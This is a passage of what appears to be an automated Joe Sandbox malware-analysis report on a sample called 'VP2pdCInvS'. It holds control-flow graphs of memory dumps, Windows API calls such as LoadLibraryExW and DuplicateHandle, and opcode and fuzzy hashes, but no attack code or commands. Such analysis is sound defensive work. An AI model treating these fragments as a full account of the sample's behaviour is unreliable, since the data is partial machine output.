                                                                                                                                                                                                                                          control_flow_graph 294 6380d80-6380dcb 300 6380efd-6380f10 294->300 301 6380dd1-6380dd3 294->301 304 6381006-6381011 300->304 305 6380f16-6380f25 300->305 302 6380dd6-6380de5 301->302 308 6380deb-6380e1d 302->308 309 6380e9d-6380ea1 302->309 307 6381019-6381022 304->307 314 6380f2b-6380f51 305->314 315 6380fd1-6380fd5 305->315 343 6380e1f-6380e24 308->343 344 6380e26-6380e2d 308->344 310 6380eb0 309->310 311 6380ea3-6380eae 309->311 313 6380eb5-6380eb8 310->313 311->313 313->307 320 6380ebe-6380ec2 313->320 345 6380f5a-6380f61 314->345 346 6380f53-6380f58 314->346 317 6380fe4 315->317 318 6380fd7-6380fe2 315->318 322 6380fe6-6380fe8 317->322 318->322 323 6380ed1 320->323 324 6380ec4-6380ecf 320->324 327 6381039-63810b5 322->327 328 6380fea-6380ff4 322->328 329 6380ed3-6380ed5 323->329 324->329 377 6381189-638119c 327->377 378 63810bb-63810bd 327->378 338 6380ff7-6381000 328->338 333 6380edb-6380ee5 329->333 334 6381025-6381032 329->334 347 6380ee8-6380ef2 333->347 334->327 338->304 338->305 348 6380e91-6380e9b 343->348 351 6380e2f-6380e50 344->351 352 6380e52-6380e76 344->352 353 6380f63-6380f84 345->353 354 6380f86-6380faa 345->354 350 6380fc5-6380fcf 346->350 347->302 349 6380ef8 347->349 348->347 349->307 350->338 351->348 367 6380e78-6380e7e 352->367 368 6380e8e 352->368 353->350 369 6380fac-6380fb2 354->369 370 6380fc2 354->370 372 6380e80 367->372 373 6380e82-6380e84 367->373 368->348 374 6380fb4 369->374 375 6380fb6-6380fb8 369->375 370->350 372->368 373->368 374->370 375->370 382 63811a2-63811b1 377->382 383 6381234-638123f 377->383 379 63810c0-63810cf 378->379 384 6381129-638112d 379->384 385 63810d1-63810dd 379->385 392 63811ff-6381203 382->392 393 63811b3-63811dc 382->393 389 6381247-6381250 383->389 386 638113c 384->386 387 638112f-638113a 384->387 398 63810e7-63810fe 385->398 391 6381141-6381144 386->391 387->391 391->389 397 638114a-638114e 391->397 395 6381212 392->395 396 6381205-6381210 392->396 416 63811de-63811e4 393->416 417 63811f4-63811fd 393->417 401 6381214-6381216 395->401 396->401 399 638115d 397->399 400 6381150-638115b 397->400 407 6381104-6381106 398->407 406 638115f-6381161 399->406 400->406 404 6381218-6381222 401->404 405 6381267-6381294 401->405 421 6381225-638122e 404->421 430 63812c4-63812c5 405->430 431 6381296-63812af 405->431 410 6381253-6381260 406->410 411 6381167-6381171 406->411 413 6381108-638110e 407->413 414 638111e-6381127 407->414 410->405 428 6381174-638117e 411->428 419 6381110 413->419 420 6381112-6381114 413->420 414->428 422 63811e8-63811ea 416->422 423 63811e6 416->423 417->421 419->414 420->414 421->382 421->383 422->417 423->417 428->379 429 6381184 428->429 429->389 432 6381333-6381350 430->432 433 63812c7-63812e9 430->433 431->433 437 63812b1-63812b7 431->437 446 6381352-6381354 432->446 447 6381356-638135a 432->447 442 63812ec-63812f0 433->442 438 63812b9 437->438 439 63812bb-63812bd 437->439 438->433 439->430 444 63812f9-63812fe 442->444 445 63812f2-63812f7 442->445 448 6381304-6381307 444->448 445->448 449 63813b8-63813db 446->449 450 638137b-638139e 447->450 451 638135c-6381379 447->451 452 63814f8-6381500 448->452 453 638130d-6381322 448->453 449->442 465 63813a0-63813a6 450->465 466 63813b6 450->466 451->449 453->442 458 6381324 453->458 462 6381498 458->462 463 638132b-6381331 458->463 464 63813e0-6381405 458->464 469 63814a2-63814b9 462->469 463->432 475 638140b-638140f 464->475 476 6381407-6381409 464->476 467 63813a8 465->467 468 63813aa-63813ac 465->468 466->449 467->466 468->466 472 63814bf-63814f3 469->472 472->442 479 6381430-6381453 475->479 480 6381411-638142e 475->480 478 638146d-6381493 476->478 478->442 488 638146b 479->488 489 6381455-638145b 479->489 480->478 488->478 490 638145d 489->490 491 638145f-6381461 489->491 490->488 491->488
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-2551331179
                                                                                                                                                                                                                                          • Opcode ID: 90287f0f37fef18b07d702ae07f48d81a50049ac240b2ad3d45c763cdaf2e431
                                                                                                                                                                                                                                          • Instruction ID: 1d86ada3d85bf61de2c4b7605b502f1eb95b75f648362dba9aaf25befe7458e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90287f0f37fef18b07d702ae07f48d81a50049ac240b2ad3d45c763cdaf2e431
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D32D434B003059FDB59EB69C854ABE7BFABF89700B14845AE406CB7A2CB74DC05CB91

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 492 29ed0b8-29ed147 GetCurrentProcess 496 29ed149-29ed14f 492->496 497 29ed150-29ed184 GetCurrentThread 492->497 496->497 498 29ed18d-29ed1c1 GetCurrentProcess 497->498 499 29ed186-29ed18c 497->499 501 29ed1ca-29ed1e2 498->501 502 29ed1c3-29ed1c9 498->502 499->498 505 29ed1eb-29ed21a GetCurrentThreadId 501->505 502->501 506 29ed21c-29ed222 505->506 507 29ed223-29ed285 505->507 506->507
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 029ED136
                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 029ED173
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 029ED1B0
                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 029ED209
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                                                                                                          • String ID: x
                                                                                                                                                                                                                                          • API String ID: 2063062207-2890206012
                                                                                                                                                                                                                                          • Opcode ID: 58ac2158fe26bcf11f4f9a0a11132cb9b3985874025b3e95acad1e46d35345f5
                                                                                                                                                                                                                                          • Instruction ID: 2f8d1d3a791849cbd80b59e83566b4b426d034d8555f7ca36b307ade4aa0eb83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58ac2158fe26bcf11f4f9a0a11132cb9b3985874025b3e95acad1e46d35345f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 165138B09003499FDB14DFA9D548B9EBBF5FF48304F208459E019A73A0DB789984CB65

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 513 6381582-6381584 514 638158e 513->514 515 6381598-63815af 514->515 516 63815b5-63815b7 515->516 517 63815b9-63815bf 516->517 518 63815cf-63815f1 516->518 519 63815c1 517->519 520 63815c3-63815c5 517->520 523 6381638-638163f 518->523 519->518 520->518 524 6381571-6381580 523->524 525 6381645-6381747 523->525 524->513 528 63815f3-63815f7 524->528 529 63815f9-6381604 528->529 530 6381606 528->530 532 638160b-638160e 529->532 530->532 532->525 535 6381610-6381614 532->535 536 6381623 535->536 537 6381616-6381621 535->537 538 6381625-6381627 536->538 537->538 539 638174a-63817a7 538->539 540 638162d-6381637 538->540 548 63817a9-63817af 539->548 549 63817bf-63817e1 539->549 540->523 550 63817b1 548->550 551 63817b3-63817b5 548->551 554 63817e4-63817e8 549->554 550->549 551->549 555 63817ea-63817ef 554->555 556 63817f1-63817f6 554->556 557 63817fc-63817ff 555->557 556->557 558 6381abf-6381ac7 557->558 559 6381805-638181a 557->559 559->554 561 638181c 559->561 562 63818d8-638198b 561->562 563 6381990-63819bd 561->563 564 6381823-63818d3 561->564 565 6381a07-6381a2c 561->565 562->554 584 63819c3-63819cd 563->584 585 6381b36-6381b73 563->585 564->554 580 6381a2e-6381a30 565->580 581 6381a32-6381a36 565->581 586 6381a94-6381aba 580->586 587 6381a38-6381a55 581->587 588 6381a57-6381a7a 581->588 590 6381b00-6381b2f 584->590 591 63819d3-6381a02 584->591 586->554 587->586 608 6381a7c-6381a82 588->608 609 6381a92 588->609 590->585 591->554 610 6381a84 608->610 611 6381a86-6381a88 608->611 609->586 610->609 611->609
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-3723351465
                                                                                                                                                                                                                                          • Opcode ID: 7cccb3bc748b63b117f33b26a865f2c48feb2ae0e65b07c0d096aab24ded3b58
                                                                                                                                                                                                                                          • Instruction ID: 8a6add153d39f262ae8122c0d2e38d7a240b9124ebae7d946bfd10bb5772947b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cccb3bc748b63b117f33b26a865f2c48feb2ae0e65b07c0d096aab24ded3b58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57C1B5347103029FDB55ABA4C854A7B7BEAEF89704F10845AE6068B392DF75DC06C7D2

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 638 6380598-63805c7 640 63805cd-63805fd 638->640 641 6380ad7-6380d2e 638->641 649 6380138-6380145 640->649 653 638076a-6380774 649->653 654 638014b-6380160 649->654 654->649 657 6380162 654->657 659 6380169-638018c 657->659 660 63803aa-63803cd 657->660 661 638049a-63804bd 657->661 662 63801de 657->662 663 6380251-638027f 657->663 664 6380422-6380445 657->664 665 6380512-6380535 657->665 666 63802c4-63802f2 657->666 667 6380337 657->667 710 6380192-6380196 659->710 711 6380777-63807a6 659->711 712 6380819-6380848 660->712 713 63803d3-63803d7 660->713 714 638095d-638098c 661->714 715 63804c3-63804c7 661->715 674 63801e8-6380204 662->674 693 6380281-6380287 663->693 694 6380297-63802bf 663->694 718 63808bb-63808ea 664->718 719 638044b-638044f 664->719 720 638053b-638053f 665->720 721 63809ff-6380a2e 665->721 691 638030a-6380332 666->691 692 63802f4-63802fa 666->692 677 6380341-638035d 667->677 685 638020a-638020c 674->685 679 6380363-6380365 677->679 689 638037d-63803a5 679->689 690 6380367-638036d 679->690 695 638020e-6380214 685->695 696 6380224-638024c 685->696 689->649 703 638036f 690->703 704 6380371-6380373 690->704 691->649 697 63802fc 692->697 698 63802fe-6380300 692->698 705 6380289 693->705 706 638028b-638028d 693->706 694->649 699 6380218-638021a 695->699 700 6380216 695->700 696->649 697->691 698->691 699->696 700->696 703->689 704->689 705->694 706->694 725 638019c-63801a6 710->725 726 63807e3-6380812 710->726 737 63807ad-63807dc 711->737 739 638084f-638087e 712->739 727 63803dd-63803e7 713->727 728 6380885-63808b4 713->728 741 6380993-63809c2 714->741 729 63809c9-63809f8 715->729 730 63804cd-63804d7 715->730 746 63808f1-6380920 718->746 731 6380455-638045f 719->731 732 6380927-6380956 719->732 733 6380a6b-6380ad0 720->733 734 6380545-638054f 720->734 748 6380a35-6380a64 721->748 736 63801ac-63801d9 725->736 725->737 726->712 738 63803ed-638041d 727->738 727->739 728->718 729->721 740 63804dd-638050d 730->740 730->741 731->746 747 6380465-6380495 731->747 732->714 733->641 734->748 749 6380555-6380585 734->749 736->649 737->726 738->649 739->728 740->649 741->729 746->732 747->649 748->733 749->649
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246681206.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6380000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: slPj
                                                                                                                                                                                                                                          • API String ID: 0-249509688
                                                                                                                                                                                                                                          • Opcode ID: 7ab17d8d2a62f044663f98d2f0794abae7183e4c19a91d140065862ce9baf9fb
                                                                                                                                                                                                                                          • Instruction ID: 591d05d128ebc210b8929e2530dfab859457d8dce1c0ee765a3a95b1d25c0df6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ab17d8d2a62f044663f98d2f0794abae7183e4c19a91d140065862ce9baf9fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1029C347403048FDB59AF74C954A6E7AB6FF86704F014968D6429B3A1CFB9EC09CB92

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 846 6393f50-6393f84 849 6393f92-6393fa5 846->849 850 6393f86-6393f8f 846->850 851 6393fab-6393fae 849->851 852 6394215-6394219 849->852 850->849 853 6393fbd-6393fc9 851->853 854 6393fb0-6393fb5 851->854 855 639421b-639422b 852->855 856 639422e-6394238 852->856 858 6393fcf-6393fe1 853->858 859 6394253-6394299 853->859 854->853 855->856 863 639414d-639415b 858->863 864 6393fe7-639403a 858->864 871 63942a8-63942d0 859->871 872 639429b-63942a5 859->872 869 6394161-639416f 863->869 870 63941e0-63941e2 863->870 895 639404a 864->895 896 639403c-6394048 call 6393c88 864->896 873 639417e-639418a 869->873 874 6394171-6394176 869->874 875 63941f0-63941fc 870->875 876 63941e4-63941ea 870->876 892 6394425-6394443 871->892 893 63942d6-63942ef 871->893 872->871 873->859 880 6394190-63941bf 873->880 874->873 887 63941fe-639420f 875->887 878 63941ec 876->878 879 63941ee 876->879 878->875 879->875 898 63941c1-63941ce 880->898 899 63941d0-63941de 880->899 887->851 887->852 909 63944ae-63944b8 892->909 910 6394445-6394467 892->910 913 63942f5-639430b 893->913 914 6394406-639441f 893->914 901 639404c-639405c 895->901 896->901 898->899 899->852 911 639405e-6394075 901->911 912 6394077-6394079 901->912 933 63944b9-639450a 910->933 934 6394469-6394485 910->934 911->912 915 639407b-6394089 912->915 916 63940c2-63940c4 912->916 913->914 935 6394311-639435f 913->935 914->892 914->893 915->916 925 639408b-639409d 915->925 921 63940d2-63940e2 916->921 922 63940c6-63940d0 916->922 931 639410d-6394113 call 63948a8 921->931 932 63940e4-63940f2 921->932 922->921 936 639411b-6394127 922->936 941 639409f-63940a1 925->941 942 63940a3-63940a7 925->942 944 6394119 931->944 946 6394105-6394108 932->946 947 63940f4-6394103 932->947 966 639452a-6394568 933->966 967 639450c-6394528 933->967 949 63944a9-63944ac 934->949 974 6394389-63943ad 935->974 975 6394361-6394387 935->975 936->887 950 639412d-6394148 936->950 948 63940ad-63940bc 941->948 942->948 944->936 946->852 947->936 948->916 960 6394239-639424c 948->960 949->909 953 6394493-6394496 949->953 950->852 953->933 957 6394498-63944a8 953->957 957->949 960->859 967->966 985 63943df-63943f8 974->985 986 63943af-63943c6 974->986 975->974 988 63943fa 985->988 989 6394403 985->989 992 63943c8-63943cb 986->992 993 63943d2-63943dd 986->993 988->989 989->914 992->993 993->985 993->986
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2246707349.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_6390000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q
                                                                                                                                                                                                                                          • API String ID: 0-1007455737
                                                                                                                                                                                                                                          • Opcode ID: 41eb1ef0dc2978b2394c3a42e57088c068471bcd7d383e300d06853de0b5a3c7
                                                                                                                                                                                                                                          • Instruction ID: 241a2c49326d6c303b113850e723937765f61522996f58f2d55a02f102ff7c68
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41eb1ef0dc2978b2394c3a42e57088c068471bcd7d383e300d06853de0b5a3c7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86E13C34F002158FCB54DF69D994AAEBBF6BF88610B148169D906EB365DB34DC06CFA0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 996 29e4248-29e5a01 CreateActCtxA 999 29e5a0a-29e5a64 996->999 1000 29e5a03-29e5a09 996->1000 1007 29e5a66-29e5a69 999->1007 1008 29e5a73-29e5a77 999->1008 1000->999 1007->1008 1009 29e5a88-29e5ab8 1008->1009 1010 29e5a79-29e5a85 1008->1010 1014 29e5a6a 1009->1014 1015 29e5aba-29e5b3c 1009->1015 1010->1009 1014->1008
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 029E59F1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                                          • Opcode ID: a7bdb8c38cb78a76c86f870c88bbb7078ad01ea6849ebd2a253c58dd77363b96
                                                                                                                                                                                                                                          • Instruction ID: 8e58c0622ea5af56d5949401ca42dd5b1366c130baff045223a18fd37e2726ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7bdb8c38cb78a76c86f870c88bbb7078ad01ea6849ebd2a253c58dd77363b96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6541F1B0C00619CFDB25DFA9C984B9DBBB5FF49308F60806AD409AB254DBB56949CF90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1017 29e5937-29e593c 1018 29e5944-29e5a01 CreateActCtxA 1017->1018 1020 29e5a0a-29e5a64 1018->1020 1021 29e5a03-29e5a09 1018->1021 1028 29e5a66-29e5a69 1020->1028 1029 29e5a73-29e5a77 1020->1029 1021->1020 1028->1029 1030 29e5a88-29e5ab8 1029->1030 1031 29e5a79-29e5a85 1029->1031 1035 29e5a6a 1030->1035 1036 29e5aba-29e5b3c 1030->1036 1031->1030 1035->1029
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 029E59F1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                                          • Opcode ID: 22bcc3fa9c238481f41a71414186def604b82f47fa70bf2494df92143db55caf
                                                                                                                                                                                                                                          • Instruction ID: 52074580502e255475cb937cb946cfc688b0c67f14466e80d5a7917bf027ac9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22bcc3fa9c238481f41a71414186def604b82f47fa70bf2494df92143db55caf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 844110B0C00619CADB24DFA9C984B8DBBB5FF48308F20805AD009BB250DBB5694ACF90

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1038 29ea858-29ea860 1040 29ea88c 1038->1040 1041 29ea862-29eb2e8 1038->1041 1043 29ea88e-29ea8c0 1040->1043 1044 29ea8ec-29ea954 1040->1044 1046 29eb2ea-29eb2ed 1041->1046 1047 29eb2f0-29eb31f LoadLibraryExW 1041->1047 1046->1047 1049 29eb328-29eb345 1047->1049 1050 29eb321-29eb327 1047->1050 1050->1049
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029EB101,00000800,00000000,00000000), ref: 029EB312
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: 77ad8c3fd0486f8c953210d3fb2db6e29248f71d89df80e92153d23fdc9bcb6a
                                                                                                                                                                                                                                          • Instruction ID: e499f683bf386986c34dedbc46709621297807453a5d3155ac93b0f11184a0d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77ad8c3fd0486f8c953210d3fb2db6e29248f71d89df80e92153d23fdc9bcb6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B731CDB68043488FDB12CFAAC894ADABFF4FF59314F04805AD455A7221C3789545CFA1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1214 29ed300-29ed394 DuplicateHandle 1215 29ed39d-29ed3ba 1214->1215 1216 29ed396-29ed39c 1214->1216 1216->1215
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029ED387
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                                                                                          • Opcode ID: 929d5ef52cedab21a75c3cc93aa4734771eb778460e0621f3a54ce1b87d07bc4
                                                                                                                                                                                                                                          • Instruction ID: 665e64f61f1fe4782920e103fe4991b8622352f857cd68a31cd8c8102faac4f2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 929d5ef52cedab21a75c3cc93aa4734771eb778460e0621f3a54ce1b87d07bc4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0021E4B59002089FDB10CF9AD584ADEBFF9FB48314F14841AE918A3350C378A940CFA0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1219 29ea870-29eb2e8 1221 29eb2ea-29eb2ed 1219->1221 1222 29eb2f0-29eb31f LoadLibraryExW 1219->1222 1221->1222 1223 29eb328-29eb345 1222->1223 1224 29eb321-29eb327 1222->1224 1224->1223
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029EB101,00000800,00000000,00000000), ref: 029EB312
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: 1a3cce01eb8f80fba59c31dcfdbb7ce9864faa69c4fb9c5e8bcf0b28c51d8539
                                                                                                                                                                                                                                          • Instruction ID: c55a719ae5d48f95da9082cb4a06340607361d40de0aafec240f4ec891cfa1ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a3cce01eb8f80fba59c31dcfdbb7ce9864faa69c4fb9c5e8bcf0b28c51d8539
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 381103B69003498FDB10CF9AC544A9EFBF8FF48314F10842AD519A7200C379A544CFA4

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1227 7982ced-79838c2 PostMessageW 1229 79838cb-79838df 1227->1229 1230 79838c4-79838ca 1227->1230 1230->1229
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 079838B5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2253329749.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7980000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                                                                                          • Opcode ID: 4f8537cfbbfd821c533c3a49b6c462c74d0df402c3114eb54ac07970298978e6
                                                                                                                                                                                                                                          • Instruction ID: 2fdc8025b7f6a20eabb016ae49a6102a527828e203ca75d19806435cd61b522f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f8537cfbbfd821c533c3a49b6c462c74d0df402c3114eb54ac07970298978e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 202156B18043899FCB11DFA9C848ADEBFF8EF4A314F14845AE558A7251C374A544CBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,029EB101,00000800,00000000,00000000), ref: 029EB312
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2230708285.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_29e0000_VP2pdCInvS.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: efcbb416ec63a4e9a51933cbc159f9280a7ad8dff03a88d8d0491c9a55be643e
                                                                                                                                                                                                                                          • Instruction ID: 356c2955ec1d3f15a8d354ab2cca1ddf3a3c787d0a1f253f19ecf3d52d67f40a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efcbb416ec63a4e9a51933cbc159f9280a7ad8dff03a88d8d0491c9a55be643e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3811E2B69003499FDB10DF9AC544A9EFBF8FB48314F14842AD519B7210C379A545CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 029EB086
                                                                                                                                                                                                                                          Memory Dump Source
